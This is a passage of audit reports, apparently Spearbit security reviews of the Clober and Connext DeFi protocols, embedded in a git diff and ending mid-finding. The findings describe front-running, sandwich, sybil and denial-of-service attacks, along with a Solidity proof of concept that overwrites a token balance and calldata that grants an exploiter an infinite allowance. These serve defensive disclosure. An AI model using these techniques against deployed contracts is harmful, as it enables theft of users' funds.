discussion Description: When heapIndex = 1 _getParentHeapIndex(uint16 heapIndex) would return 0 which is an invalid heap index. when heapIndex = 45 _getLeftChildHeapIndex(uint16 heapIndex) would return 62 which is an invalid heap index. Recommendation: None. The functions aren't called with these inputs. Clober: It appears that this input is not intended to be used within the _getParentHeapIndex , _getLeftChild- HeapIndex function. Can we proceed without making any modifications? Spearbit: Yes, the surrounding code guards against these values for _getParentHeapIndex and _getLeftChild- HeapIndex could be called for pop with this value but the while(childRawIndex <= newLength) loop would stop before the invalid heap index is used. Marked as acknowledged. +5.6.12 _priceToIndex function implemented but unused Severity: Informational Context: ArithmeticPriceBook.sol#L23 GeometricPriceBook.sol#L74 Description: The _priceToIndex function for the price books are implemented but unused. Recommendation: Consider having an external method to expose these methods, or change their visibilities to public. Clober: Due to the code size, it is impossible to make it as public now. So, we compromise it to just leave this internal function and guide users to extend this contract. Spearbit: Acknowledged. 32 +5.6.13 Incorrect _MAX_NODES and _MAX_NODES_P descriptions Severity: Informational Context: SegmentedSegmentTree464.sol#L41-L42 Description: The derivation of the values _MAX_NODES and MAX_NODES_P in the comments are incorrect. For _MAX_NODES C * ((S *C) ** L-1)) = 4 * ((2 * 4) ** 3) = 2048 is missing the E, or replace S * C with N. The issue isn't entirely resolved though, as it becomes C * (S * C * E) ** (L - 1) = 4 * (2 * 4 * 2) ** 3 = 16384 or 2 ** 14 Same with _MAX_NODES_P Recommendation: The formulas should be updated. Clober: Formulas updated in PR 39. // // uint8 private constant _R = 2; // There are `2` root node groups uint8 private constant _C = 4; // There are `4` children (each child is a node group of its own) for each node ,! uint256 private constant _N_P = 4; // C * P = 2 ** `4` uint256 private constant _MAX_NODES = 2**15; // (R * P) * ((C * P) ** (L - 1)) = `32768` uint256 private constant _MAX_NODES_P_MINUS_ONE = 14; // MAX_NODES / R = 2 ** `14` Spearbit: Fixed. Some new definitions were introduced and math now checks out. 33 6 Appendix: Issues raised by Clober +6.0.1 marketOrder() with expendOutput reverts with SlippageError with max tolerance Severity: High Risk Context: https://github.com/clober-dex/core/issues/332 Description: During the audit the Clober team raised this issue. Added here to track the fixes. Recommendation: Clober: Fixed in commit fdf90626. Spearbit: Fixed. The taker fee is now only accounted for once at the end of the function instead of each price index. +6.0.2 Wrong OrderIndex could be emitted at Claim() event. Severity: Low Risk Context: https://github.com/clober-dex/core/issues/354 Description: During the audit the Clober team raised this issue. Added here to track the fixes. Recommendation: Clober: Fixed in PR 352 . Spearbit: Fixed. claim and _cancel now also check validity of order indexes. 34 diff --git a/findings_newupdate/spearbit/Connext-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Connext-Spearbit-Security-Review.txt new file mode 100644 index 0000000..8c1e2c5 --- /dev/null +++ b/findings_newupdate/spearbit/Connext-Spearbit-Security-Review.txt @@ -0,0 +1,75 @@ +5.1.1 Lack of transferId Verification Allows an Attacker to Front-Run Bridge Transfers Severity: Critical Risk Context: NomadFacet.sol#L99-L149, BridgeRouter.sol#L176-L199, BridgeRouter.sol#L347-L381 Description: The onReceive() function does not verify the integrity of transferId against all other parameters. Although the onlyBridgeRouter modifier checks that the call originates from another BridgeRouter (assuming a correct configuration of the whitelist) to the onReceive() function, it does not check that the call originates from another Connext Diamond. Therefore, allowing anyone to send arbitrary data to BridgeRouter.sendToHook(), which is later interpreted as the transferId on Connext’s NomadFacet.sol contract. This can be abused by a front-running attack as described in the following scenario: • Alice is a bridge user and makes an honest call to transfer funds over to the destination chain. • Bob does not make a transfer but instead calls the sendToHook() function with the same _extraData but passes an _amount of 1 wei. • Both Alice and Bob have their tokens debited on the source chain and must wait for the Nomad protocol to optimistically verify incoming TransferToHook messages. • Once the messages have been replicated onto the destination chain, Bob processes the message before Alice, causing onReceive() to be called on the same transferId. • However, because _amount is not verified against the transferId, Alice receives significantly less tokens and the s.reconciledTransfers mapping marks the transfer as reconciled. Hence, Alice has effectively lost all her tokens during an attempt to bridge them. function onReceive( uint32, // _origin, not used uint32, // _tokenDomain, not used bytes32, // _tokenAddress, of canonical token, not used address _localToken, uint256 _amount, bytes memory _extraData ) external onlyBridgeRouter { bytes32 transferId = bytes32(_extraData); // Ensure the transaction has not already been handled (i.e. previously reconciled). if (s.reconciledTransfers[transferId]) { revert NomadFacet__reconcile_alreadyReconciled(); } // Mark the transfer as reconciled. s.reconciledTransfers[transferId] = true; Note: the same issues exists with _localToken. As a result a malicious user could perform the same attack by using a malicious token contract and transferring the same amount of tokens in the call to sendToHook(). Recommendation: Verify that the call originates from the Connext Diamond on the originator chain. In function reconcile() verify that transferId is indeed a hash of the other parameters. Connext: Solved in PR 1630 and PR 1678. Spearbit: Note: The BridgeRouter and the interface to it has changed quite a lot during and after this audit. As it was out of scope for this audit it is also important to conduct a separate review of that particular code, including the interface to Connext. Connext: An extra audit for BridgeRouter is underway. 5 Spearbit: Acknowledged. +5.1.2 Use of spot dex price when repay portal debt leads to sandwich attacks Severity: Critical Risk Context: NomadFacet.sol#L286-L290 NomadFacet.sol#L204-L209 Description: When the NomadFacet repays the portal debt it has to convert local assets into adopted assets. It first calulates how many assets it needs to swap and then convert the local assets into the adopted assets. function _reconcileProcessPortal( bytes32 _canonicalId, uint256 _amount, address _local, bytes32 _transferId ) private returns (uint256) { // Calculates the amount to be repaid to the portal in adopted asset (uint256 totalRepayAmount, uint256 backUnbackedAmount, uint256 portalFee) = _calculatePortalRepayment( ,! _canonicalId, _amount, _transferId, _local ); ... //@audit totalRepayAmount is dependent on the AMM spot price. The swap will not hit the slippage (bool swapSuccess, uint256 amountIn, address adopted) = AssetLogic.swapFromLocalAssetIfNeededForExactOut( ,! _canonicalId, _local, totalRepayAmount, _amount ); function _calculatePortalRepayment( bytes32 _canonicalId, uint256 _localAmount, bytes32 _transferId, address _local ) internal returns ( uint256, uint256, uint256 ) { // @audit A manipulated spot price might be used. availableAmount might be extremely small (uint256 availableAmount, address adopted) = AssetLogic.calculateSwapFromLocalAssetIfNeeded( _canonicalId, _local, _localAmount ); // @audit If there aren't enough funds to repay, the protocol absorbs all the slippage if (totalRepayAmount > availableAmount) { ... backUnbackedAmount = availableAmount; portalFee = 0; ... 6 totalRepayAmount = backUnbackedAmount + portalFee; ... return (totalRepayAmount, backUnbackedAmount, portalFee); } The _calculatePortalRepayment function calculates the debt to be repaid, totalRepayAmount. It also calculates the post-swap amount,availableAmount. If the post-swap amount is enough to pay for the outlying debt, total- RepayAmount equals the outlying debt. If not, it equalsavailableAmount. Since the totalRepayAmount is always smaller than the post-swap amount availableAmount which is derived from the AMM price, the swap will not hit the slippage even if the price is off. Assume the price is manipulated to 1:100. availableAmount and totalRepayAmount would both approximate to _amount / 100. The swap will not hit the slippage as _amount can convert to _amount / 100 in this case. Exploiters can manipulate the DEX and launch a sandwich attack on every repayment. This can also be done on different chains, making the attackers millions in potential profit. Connext: We have decided to lean on the policy that Aave portals will not be automatically repaid. Adding in the automatic repayment of portals adds complexity to the core codebase and leads to issues. Even with the portal repayment in place, issues such as a watcher disconnecting the xapp for an extended period mean we have to support out of band repayments regardless. By leaning on this as the only method of repayment, we are able to reduce the code complexity on reconcile. Furthermore, it does not substantially reduce trust. Aave portals essentially amount to an unsecured credit line, usable by bridges. If the automatic repayment fails for any reason (i.e. due to bad pricing in the AMM), then the LP associated with the loan must be responsible for closing out the position in a trusted way. Solved in PR 1585 by removing this code. Spearbit: Verified. +5.1.3 swapOut allows overwrite of token balance Severity: Critical Risk Context: StableSwapFacet.sol#L266-L281, SwapUtils.sol#L740-L781, SwapUtils.sol#L417-L473 Description: The StableSwapFacet has the function swapExactOut() where a user could supply the same as- setIn address as assetOut, which means the TokenIndexes for tokenIndexFrom and tokenIndexTo function swapOut() are the same. In function swapOut() a temporay array is used to store balances. When updating such balances, first self.balances[tokenIndexFrom] is updated and then self.balances[tokenIndexTo] is updated afterwards. However when tokenIndexFrom == tokenIndexTo the second update overwrites the first update, causing token balances to be arbitrarily lowered. This also skews the exchange rates, allowing for swaps where value can be extracted. Note: the protection against this problem is location in function getY(). However, this function is not called from swapOut(). Note: the same issue exists in swapInternalOut(), which is called from swapFromLocalAssetIfNeededForEx- actOut() via _swapAssetOut(). However, via this route it is not possible to specify arbitrary token indexes. There- fore, there isn’t an immediate risk here. 7 contract StableSwapFacet is BaseConnextFacet { ... function swapExactOut(... ,address assetIn, address assetOut, ... ) ... { return s.swapStorages[canonicalId].swapOut( getSwapTokenIndex(canonicalId, assetIn), getSwapTokenIndex(canonicalId, assetOut), amountOut, maxAmountIn // assetIn could be same as assetOut ); } ... } library SwapUtils { function swapOut(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... uint256[] memory balances = self.balances; ... self.balances[tokenIndexFrom] = balances[tokenIndexFrom].add(dx).sub(dxAdminFee); self.balances[tokenIndexTo] = balances[tokenIndexTo].sub(dy); // overwrites previous update if ,! From==To ... } function getY(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... require(tokenIndexFrom != tokenIndexTo, "compare token to itself"); // here is the protection ... } } Below is a proof of concept which shows that the balances of index 3 can be arbitrarily reduced. //SPDX-License-Identifier: MIT pragma solidity 0.8.14; import "hardhat/console.sol"; contract test { uint[] balances = new uint[](10); function swap(uint8 tokenIndexFrom,uint8 tokenIndexTo,uint dx) public { uint dy=dx; // simplified uint256[] memory mbalances = balances; balances[tokenIndexFrom] = mbalances[tokenIndexFrom] + dx; balances[tokenIndexTo] = mbalances[tokenIndexTo] - dy; } constructor() { balances[3] = 100; swap(3,3,10); console.log(balances[3]); // 90 } } Recommendation: Add the following to swapExactOut() and swapInternalOut(): require(tokenIndexFrom != tokenIndexTo, "compare token to itself"); Connext: Solved in PR 1528. Spearbit: Verified. 8 +5.1.4 Use of spot price in SponsorVault leads to sandwich attack. Severity: Critical Risk Context: SponsorVault.sol#L208 Description: There is a special role sponsor in the protocol. Sponsors can cover the liquidity fee and transfer fee for users, making it more favorable for users to migrate to the new chain. Sponsors can either provide liquidity for each adopted token or provide the native token in the SponsorVault. If the native token is provided, the SponsorVault will swap to the adopted token before transferring it to users. contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { ... function reimburseLiquidityFees( address _token, uint256 _liquidityFee, address _receiver ) external override onlyConnext returns (uint256) { ... uint256 amountIn = tokenExchange.getInGivenExpectedOut(_token, _liquidityFee); amountIn = currentBalance >= amountIn ? amountIn : currentBalance; // sponsored fee may end being less than _liquidityFee due to slippage sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); ... } } The spot AMM price is used when doing the swap. Attackers can manipulate the value of getInGivenExpectedOut and make SponsorVault sell the native token at a bad price. By executing a sandwich attack the exploiters can drain all native tokens in the sponsor vault. For the sake of the following example, assume that _token is USDC and native token is ETH, the sponsor tries to sponsor 100 usdc to the users: • Attacker first manipulates the DEX and makes the exchange of 1 ETH = 0.1 USDC. • getInGivenExpectedOut returns 100 / 0.1 = 1000. • tokenExchange.swapExactIn buys 100 USDC with 1000 ETH, causing the ETH price to decrease even lower. • Attacker buys ETH at a lower prices and realizes a profit. Recommendation: Instead of relying on DEXe’s spot price the sponsor vault should rely instead on price quotes which are harder to manipulate, like those provided by an oracle (e.g. chainlink price, uniswap TWAP). The SponsorVault should fetch the oracle price and compare it against the spot price. The SponsorVault should either revert or use the oracle price when the spot price deviates from the oracle price. Connext: Solved in PR 1595. Spearbit: Verified. 9 5.2 High Risk +5.2.1 Configuration is crucial (both Nomad and Connext) Severity: High Risk Context: BridgeFacet.sol#L231-L238, BridgeFacet.sol#L257-L265, BridgeFacet.sol#L271-L276, Router.sol#L37- L39, XAppConnectionManager.sol#L106-L108, XAppConnectionManager.sol#L115-L125 Description: The Connext and Nomad protocol rely heavily on configuration parameters. These parameters are configured during deployment time and are updated afterwards. Configuration errors can have major conse- quences. Examples of important configurations are: • BridgeFacet.sol: s.promiseRouter. • BridgeFacet.sol: s.connextions. • BridgeFacet.sol: s.approvedSequencers. • Router.sol: remotes[]. • xAppConnectionManager.sol: home . • xAppConnectionManager.sol: replicaToDomain[]. • xAppConnectionManager.sol: domainToReplica[]. Recommendation: Have rigorous controls when configuring and updating these values. +5.2.2 Deriving price with balanceOf is dangerous Severity: High Risk Context: ConnextPriceOracle.sol#L109-L135 Description: getPriceFromDex derives the price by querying the balance of AMM’s pools. function getPriceFromDex(address _tokenAddress) public view returns (uint256) { PriceInfo storage priceInfo = priceRecords[_tokenAddress]; ... uint256 rawTokenAmount = IERC20Extended(priceInfo.token).balanceOf(priceInfo.lpToken); ... uint256 rawBaseTokenAmount = IERC20Extended(priceInfo.baseToken).balanceOf(priceInfo.lpToken); ... } Deriving the price with balanceOf is dangerous as balanceOf may be gamed. Consider univ2 as an example; Exploiters can first send tokens into the pool and pump the price, then absorb the tokens that were previously donated by calling mint. Recommendation: Consider querying DEX’s state through function calls such as Univ2’s getReserves() which returns the correct state of the pool. Connext: Solved in PR 1649. Spearbit: Verified. 10 +5.2.3 Routers can sybil attack the sponsor vault to drain funds Severity: High Risk Context: BridgeFacet.sol#L652-L688 Description: When funds are bridged from source to destination chain messages must first go through optimistic verification before being executed on the destination BridgeFacet.sol contract. Upon transfer processing the contract checks if the domain is sponsored. If such is the case then the user is reimbursed for both liquidity fees paid when the transfer was initiated and for the fees paid to the relayer during message propagation. There currently isn’t any mechanism to detect sybil attacks. Therefore, a router can perform several large value transfers in an effort to drain the sponsor vault of its funds. Because liquidity fees are paid to the router by a user connected to the router, there isn’t any value lost in this type of attack. Recommendation: Consider re-thinking the sponsor vault design or it may be safer to have it removed altogether. Connext: Cap implemented in PR 1631. There is no total mitigation of sybil attacks on the vault possible, and this should be clearly explained to anyone who decides to deploy and fund one. Spearbit: Verified and acknowledged. +5.2.4 Routers are exposed to extreme slippage if they attempt to repay debt before being reconciled Severity: High Risk Context: AssetLogic.sol#L308-L362 NomadFacet.sol#L188-L209, NomadFacet.sol#L269-L320, AssetLogic.sol#L228-L250, Description: When routers are reconciled, the local asset may need to be exchanged for the adopted asset in order to repay the unbacked Aave loan. AssetLogic.swapFromLocalAssetIfNeededForExactOut() takes two key arguments: • _amount representing exactly how much of the adopted asset should be received. • _maxIn which is used to limit slippage and limit how much of the local asset is used in the swap. Upon failure to swap, the protocol will reset the values for unbacked Aave debt and distribute local tokens to the router. However, if this router partially paid off some of the unbacked Aave debt before being reconciled, _maxIn will diverge from _amount, allowing value to be extracted in the form of slippage. As a result, routers may receive less than the amount of liquidity they initially provided, leading to router insolvency. Recommendation: Instead of using _amount to represent _maxIn, consider using some sort of user slippage amount. Alternatively, it may be easier/safer to restrict who can use Aave unbacked debt as there is a lot of added complexity in integrating unbacked debt into the protocol. Connext: Solved in PR 1585. Spearbit: Verified. +5.2.5 Malicious call data can DOS execute Severity: High Risk Context: Executor.sol#L142-L243 Description: An attacker can DOS the executor contract by giving infinite allowance to normal users. Since the executor increases allowance before triggering an external call, the tx will always revert if the allowance is already infinite. 11 function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes ,! memory) { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); // reverts if set to `infinite` before } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...) // can set to `infinite` allowance ... ,! ,! } Recommendation: Set the allowance to 0 before using safeIncreaseAllowance. Note: also see issue Not always safeApprove(..., 0) Connext: Solved in PR 1550. Spearbit: Verified. +5.2.6 DOS attack on the Nomad Home.sol Contract Severity: High Risk Context: Home.sol#L332, Queue.sol#L119-L130 Description: Upon calling xcall(), a message is dispatched via Nomad. A hash of this message is inserted into the merkle tree and the new root will be added at the end of the queue. Whenever the updater of Home.sol commits to a new root, improperUpdate() will check that the new update is not fraudulent. In doing so, it must iterate through the queue of merkle roots to find the correct committed root. Because anyone can dispatch a message and insert a new root into the queue it is possible to impact the availability of the protocol by preventing honest messages from being included in the updated root. function improperUpdate(..., bytes32 _newRoot, ... ) public notFailed returns (bool) { ... // if the _newRoot is not currently contained in the queue, // slash the Updater and set the contract to FAILED state if (!queue.contains(_newRoot)) { _fail(); ... } ... } function contains(Queue storage _q, bytes32 _item) internal view returns (bool) { for (uint256 i = _q.first; i <= _q.last; i++) { if (_q.queue[i] == _item) { return true; } } return false; } Recommendation: Consider altering the queuing system such that improperUpdate() takes in an index argument that is greater than the old root. By specifying the index we can check that the new root is valid in O(1) time instead of O(n) time. Alternatively, it may be better to remove the queuing system altogether. Connext: This is discussed in the Nomad Quantstamp audit report, and will be addressed by removing the queue for messaging in a future upgrade. Going to leave this issue open, though will note that this attack is costly to perform and (currently) exists within the Nomad protocol. 12 Spearbit: Acknowledged. +5.2.7 Upon failing to back unbacked debt _reconcileProcessPortal() will leave the converted asset in the contract Severity: High Risk Context: NomadFacet.sol#L225-L242 Description: When routers front liquidity for the protocol’s users they are later reconciled once the bridge has optimistically verified transfers from the source chain. Upon being reconciled, the _reconcileProcessPortal() attempts to first pay back Aave debt before distributing the rest back to the router. However, _reconcileProcess- Portal() will not convert the adopted asset back to the local asset in the case where the call to the Aave pool fails. Instead, the function will set amountIn = 0 and continue to distribute the local asset to the router. if (success) { emit AavePortalRepayment(_transferId, adopted, backUnbackedAmount, portalFee); } else { // Reset values s.portalDebt[_transferId] += backUnbackedAmount; s.portalFeeDebt[_transferId] += portalFee; // Decrease the allowance SafeERC20.safeDecreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); // Update the amount repaid to 0, so the amount is credited to the router amountIn = 0; emit AavePortalRepaymentDebt(_transferId, adopted, s.portalDebt[_transferId], s.portalFeeDebt[_transferId]); ,! } Recommendation: It might be useful to convert the adopted asset amount back to the local asset such that subsequent swaps do not fail due to an insufficient amount of local asset. Alternatively, if the attempt to back unbacked debt fails, consider transferring the adopted asset out to the liquidity provider so they can handle this themselves. Connext: We have decided to lean on the policy that Aave portals will not be automatically repaid. Adding in the automatic repayment of portals adds complexity to the core codebase and leads to issues. Even with the portal repayment in place, issues such as a watcher disconnecting the xapp for an extended period mean we have to support out of band repayments regardless. By leaning on this as the only method of repayment, we are able to reduce the code complexity on reconcile. Furthermore, it does not substantially reduce trust. Aave portals essentially amount to an unsecured credit line, usable by bridges. If the automatic repayment fails for any reason (i.e. due to bad pricing in the AMM), then the LP associated with the loan must be responsible for closing out the position in a trusted way. Solved in PR 1585 by removing this code. Spearbit: Verified. 13 +5.2.8 _handleExecuteTransaction() doesn’t handle native assets correctly Severity: High Risk Context: BridgeFacet.sol#L644-L718, Executor.sol#L142-L243 Description: The function _handleExecuteTransaction() sends any native tokens to the executor contract first, and then calls s.executor.execute(). This means that within that function msg.value will always be 0. So the associated logic that uses msg.value doesn’t work as expected and the function doesn’t handle native assets correctly. Note: also see issue "Executor reverts on receiving native tokens from BridgeFacet" contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...)... { ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); // no native tokens send } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... if (isNative && msg.value != _args.amount) { // msg.value is always 0 ... } } } Recommendation: Change to code of execute() to handle previously send native assets. Or send the native assets along with the call to execute(). Connext: Solved in PR 1532. Spearbit: Verified. Connext: Alternate approach: removed native asset handling. Implemented in PR 31. Spearbit: Verified. +5.2.9 Add checks to xcall() Severity: High Risk Context: BridgeFacet.sol#L240-L339, BridgeFacet.sol#L400-L419, Executor.sol#L142-L280 Description: The function xcall() does some sanity checks, nevertheless more checks should be added to prevent issues later on in the use of the protocol. If _args.recovery== 0 then _sendToRecovery() will send funds to the 0 address, effectively losing them. If _params.agent == 0 the forceReceiveLocal can’t be used and funds might be locked forever. The _args.params.destinationDomain should never be s.domain, although this is also implicitly checked via _mustHaveRemote() assuming a correct configuration. If _args.params.slippageTol is set to something greater than s.LIQUIDITY_FEE_DENOMINATOR then funds can be locked as xcall() allows for the user to provide the local asset, avoiding any swap while _handleExecuteLiquid- ity() in execute() may attempt to perform a swap on the destination chain. function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { // Sanity checks. ... } 14 Recommendation: Consider adding the following checks: • recovery != 0. • agent !=0. • _args.params.destinationDomain != s.domain. • _args.params.slippageTol <=s.LIQUIDITY_FEE_DENOMINATOR. Also doublecheck if any additional checks are useful. Connext: Solved in PR 1536. Spearbit: Verified. +5.2.10 Executor and AssetLogic deals with the native tokens inconsistently that breaks execute() Severity: High Risk Context: Executor.sol#L142 AssetLogic.sol#L127-L151, BridgeFacet.sol#L644-L718 Description: When dealing with an external callee the BridgeFacet will transfer liquidity to the Executor before calling Executor.execute. In order to send the native token: • The Executor checks for _args.assetId == address(0). • AssetLogic.transferAssetFromContract() disallows address(0). Note: also see issue Executor reverts on receiving native tokens from BridgeFacet. 15 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction() ...{ ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); // _asset may not ,! be 0 (bool success, bytes memory returnData) = s.executor.execute( IExecutor.ExecutorArgs( // assetId parameter from ExecutorArgs // must be 0 for Native asset ... _asset, ... ) ); ... } } library AssetLogic { function transferAssetFromContract( address _assetId, ... ) { ... // No native assets should ever be stored on this contract if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... bool isNative = _args.assetId == address(0); ... } } The BridgeFacet cannot handle external callees when using native tokens. Recommendation: The native tokens are either represented as address(0) or address(wrapper) throughout the whole code base, causing this inconsistency to be error prone. Recommend the team to go through the whole code base and make sure it’s used consistently. Connext: Solved in PR 1532. Spearbit: Verified. Connext: Alternate approach: removed native asset handling. Implemented in PR 1641. Spearbit: Verified. 16 +5.2.11 Executor reverts on receiving native tokens from BridgeFacet Severity: High Risk Context: Executor.sol BridgeFacet.sol#L696, AssetLogic.sol#L127-L151 Description: When doing an external call in execute(), the BridgeFacet provides liquidity into the Executor contract before calling Executor.execute. The BridgeFacet transfers native token when address(wrapper) is provided. The Executor however does not have a fallback/ receive function. Hence, the transaction will revert when the BridgeFacet tries to send the native token to the Executor contract. function _handleExecuteTransaction( ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); ... } function transferAssetFromContract(...) ... { ... if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ... } } Recommendation: Recommend to add a receive function in the Executor contract. receive() payable external { require(msg.sender == connext); } Or unwrap the native asset and send it along with the call to the executor. Connext: Ether sent along with the call. Solved in PR 1532. Spearbit: Verified. Connext: Alternate approach: removed native asset handling. Implemented in PR 31. Spearbit: Verified. +5.2.12 SponsorVault sponsors full transfer amount in reimburseLiquidityFees() Severity: High Risk Context: BridgeFacet.sol#L660-L663 Description: The BridgeFacet passes args.amount as _liquidityFee when calling reimburseLiquidityFees. Instead of sponsoring liquidityFee, the sponsor vault would sponsor full transfer amount to the reciever. Note: Luckily the amount in reimburseLiquidityFees is capped by relayerFeeCap. function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, _args.params.to) ); ,! } 17 Recommendation: Pass args.amount * (s.LIQUIDITY_FEE_DENOMINATOR - s.LIQUIDITY_FEE_NUMERATOR) / s.LIQUIDITY_FEE_DENOMINATOR instead. Connext: Solved in PR 1551. Spearbit: Verified. +5.2.13 Tokens can get stuck in Executor contract if the destination doesn’t claim them all Severity: High Risk Context: Executor.sol#L142-L243 Description: The function execute() increases allowance and then calls the recipient (_args.to). When the recipient does not use all tokens, these could remain stuck inside the Executor contract. Note: the executor can have excess tokens, see: kovan executor. Note: see issue "Malicious call data can DOS execute or steal unclaimed tokens in the Executor contract". function execute(...) ... { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, ... ); ... } Recommendation: Determine what should happen with unclaimed tokens. Consider one or more of the following suggestions: • Send the unclaimed tokens to the recovery address via _sendToRecovery() (although this further compli- cates the contract). • Set the allowance to 0 (before safeIncreaseAllowance() or after the call to excessivelySafeCall() ). • Allow the retrieval of unclaimed tokens from the executor contract by an owner. Connext: New policy: "any funds left in the Executor following a transfer are claimable by anyone" . This forces implementers to think carefully about the calldata. Thus leave the issues as is. Spearbit: Acknowledged. Note: as it requires some deliberate action to retrieve the tokens, in practice several tokens will stay behind in the executor. +5.2.14 reimburseLiquidityFees send tokens twice Severity: High Risk Context: BridgeFacet.sol#L644-L675, SponsorVault.sol#L197-L226, ITokenExchange.sol#L18-L24 Description: The function reimburseLiquidityFees() is called from the BridgeFacet, making the msg.sender within this function to be BridgeFacet. When using tokenExchanges via swapExactIn() tokens are sent to msg.sender, which is the BridgeFacet. Then, tokens are sent again to msg.sender via safeTransfer(), which is also the BridgeFacet. Therefore, tokens end up being sent to the BridgeFacet twice. Note: the check ...balanceOf(...) != starting + sponsored should fail too. Note: The fix in C4 seems to introduce this issue: code4rena-246 18 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(... ) ... { ... uint256 starting = IERC20(_asset).balanceOf(address(this)); ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, ,! _args.params.to) ); if (success) { uint256 sponsored = abi.decode(data, (uint256)); // Validate correct amounts are transferred if (IERC20(_asset).balanceOf(address(this)) != starting + sponsored) { // this should revert BridgeFacet__handleExecuteTransaction_invalidSponsoredAmount(); ,! fail now } ... } ... } } contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { function reimburseLiquidityFees(... ) { if (address(tokenExchanges[_token]) != address(0)) { ... sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); // send to ,! msg.sender } else { ... } ... IERC20(_token).safeTransfer(msg.sender, sponsoredFee); // send again to msg.sender } } interface ITokenExchange { /** * @notice Swaps the exact amount of native token being sent for a given token. * @param token The token to receive * @param recipient The recipient of the token * @return The amount of tokens resulting from the swap */ function swapExactIn(address token, address recipient) external payable returns (uint256); } Recommendation: Doublecheck the code to see what the intended behavior is. Connext: Solved in PR 1551. Spearbit: Verified. 19 +5.2.15 Anyone can repay the portalDebt with different tokens Severity: High Risk Context: PortalFacet.sol#L80-L113 PortalFacet.sol#L115-L167 Description: Routers can provide liquidity in the protocol to improve the UX of cross-chain transfers. Liquidity is sent to users under the router’s consent before the cross-chain message is settled on the optimistic message protocol, i.e., Nomad. The router can also borrow liquidity from AAVE if the router does not have enough of it. It is the router’s responsibility to repay the debt to AAVE. contract PortalFacet is BaseConnextFacet { function repayAavePortalFor( address _adopted, uint256 _backingAmount, uint256 _feeAmount, bytes32 _transferId ) external payable { address adopted = _adopted == address(0) ? address(s.wrapper) : _adopted; ... // Transfer funds to the contract uint256 total = _backingAmount + _feeAmount; if (total == 0) revert PortalFacet__repayAavePortalFor_zeroAmount(); (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // repay the loan _backLoan(adopted, _backingAmount, _feeAmount, _transferId); } } The PortalFacet does not check whether _adopted is the correct token in debt. Assume that the protocol borrows ETH for the current _transferId, therefore Router should repay ETH to clear the debt. However, the Router can provide any valid tokens, e.g. DAI, USDC, to clear the debt. This results in the insolvency of the protocol. Note: a similar issue is also present in repayAavePortal(). Recommendation: Check _adopted is the correct token in this transfer. Connext: Solved in PR 1559. Spearbit: Verified. +5.2.16 Malicious call data can steal unclaimed tokens in the Executor contract Severity: High Risk Context: Executor.sol#L211 Description: Users can provide a destination contract args.to and arbitrary data _args.callData when doing a cross-chain transfer. The protocol will provide the allowance to the callee contract and triggers the function call through ExcessivelySafeCall.excessivelySafeCall. 20 contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... // Try to execute the callData // the low level call will return `false` if its execution reverts (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); ... } } Since there aren’t restrictions on the destination contract and calldata, exploiters can steal the tokens from the executor. Note: the executor does have excess tokens, see: see: kovan executor. Note: see issue Tokens can get stuck in Executor contract. Tokens can be stolen by granting an allowance. Setting calldata = abi.encodeWithSelector(ERC20.approve.selector, exploiter, type(uint256).max); and args.to = tokenAddress allows the exploiter to get an infinite allowance of any token, effectively stealing any unclaimed tokens left in the executor. Recommendation: The protocol could communicate with the callee contract through a callback function. A possible specification of the callback: function connextExecute(uint32 origin, address adoptedToken, address originSender, uint256 amount, ,! bytes calldata callData) returns(bytes4) This results in higher gas efficiency because callees do not have to query origin, originSender, and amount through three separate external calls. Note: this way arbitrary calls are not possible anymore. Connext: New policy: "any funds left in the Executor following a transfer are claimable by anyone". This forces implementers to think carefully about the calldata. Thus leave the issues as is. Spearbit: Acknowledged. 21 5.3 Medium Risk +5.3.1 Fee-On-Transfer tokens are not explicitly denied in swap() Severity: Medium Risk Context: SwapUtils.sol#L690-L729 Description: The swap() function is used extensively within the Connext protocol, primarily when swapping be- tween local and adopted assets. When a swap is performed, the function will check the actual amount transferred. However, this is not 